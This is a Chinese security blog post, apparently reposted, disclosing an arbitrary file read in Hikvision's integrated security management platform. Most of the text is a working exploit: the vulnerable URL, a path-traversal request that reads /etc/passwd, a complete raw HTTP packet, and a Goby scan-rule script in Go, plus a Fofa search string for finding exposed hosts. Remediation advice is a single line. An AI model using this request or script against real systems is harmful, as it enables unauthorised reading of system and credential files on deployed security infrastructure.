【任意文件读取】海康综合安防管理平台

admin 2024年7月15日15:33:35评论43 views字数 2551阅读8分30秒阅读模式
漏洞描述

海康威视的综合安防管理平台是一套高度集成的智能化系统,它可以对接多个安全子系统,如视频监控、报警系统、门禁系统、考勤系统、可视对讲系统以及停车场管理系统等,其存在任意文件读取漏洞,造成信息泄露。
漏洞复现

漏洞URL:/center/api/task/..;/orgManage/v1/orgs/download

漏洞参数:fileName

漏洞详情:

1、打开自己的服务

【任意文件读取】海康综合安防管理平台

2、使用以下数据包进行访问

GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateTe: trailersConnection: close

3、漏洞检测存在

【任意文件读取】海康综合安防管理平台

 

goby检测规则脚本:

package exploits
import (  "git.gobies.org/goby/goscanner/goutils")
func init() {  expJson := `{  "Name": "海康综合管理平台 readfile",  "Description": "",  "Product": "",  "Homepage": "",  "DisclosureDate": "2024-05-31",  "PostTime": "2024-05-31",  "Author": "[email protected]",  "FofaQuery": "title="综合安防管理平台"",  "GobyQuery": "title="综合安防管理平台"",  "Level": "3",  "Impact": "",  "Recommendation": "",  "References": [],  "Is0day": false,  "HasExp": false,  "ExpParams": [],  "ExpTips": {    "Type": "",    "Content": ""  },  "ScanSteps": [    "AND",    {      "Request": {        "method": "GET",        "uri": "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd",        "follow_redirect": true,        "header": {          "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",          "Accept-Encoding": "gzip, deflate",          "Accept": "*/*",          "Connection": "keep-alive"        },        "data_type": "text",        "data": ""      },      "ResponseTest": {        "type": "group",        "operation": "AND",        "checks": [          {            "type": "item",            "variable": "$code",            "operation": "==",            "value": "200",            "bz": ""          },          {            "type": "item",            "variable": "$body",            "operation": "contains",            "value": "root:",            "bz": ""          }        ]      },      "SetVariable": []    }  ],  "ExploitSteps": [    "AND",    {      "Request": {        "method": "GET",        "uri": "/test.php",        "follow_redirect": true,        "header": {},        "data_type": "text",        "data": ""      },      "ResponseTest": {        "type": "group",        "operation": "AND",        "checks": [          {            "type": "item",            "variable": "$code",            "operation": "==",            "value": "200",            "bz": ""          },          {            "type": "item",            "variable": "$body",            "operation": "contains",            "value": "test",            "bz": ""          }        ]      },      "SetVariable": []    }  ],  "Tags": [],  "VulType": [],  "CVEIDs": [    ""  ],  "CVSSScore": "",  "Translation": {    "CN": {      "Name": "海康综合管理平台 readfile",      "Product": "",      "Description": "",      "Recommendation": "",      "Impact": "",      "VulType": [],      "Tags": []    },    "EN": {      "Name": "海康综合管理平台 readfile",      "Product": "",      "Description": "",      "Recommendation": "",      "Impact": "",      "VulType": [],      "Tags": []    }  },  "PocGlobalParams": {},  "ExpGlobalParams": {}}`
  ExpManager.AddExploit(NewExploit(    goutils.GetFileName(),    expJson,    nil,    nil,  ))}

 

修复建议

升级至安全版本。

原文始发于微信公众号(小羊安全屋):【任意文件读取】海康综合安防管理平台

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日15:33:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【任意文件读取】海康综合安防管理平台http://cn-sec.com/archives/2800124.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息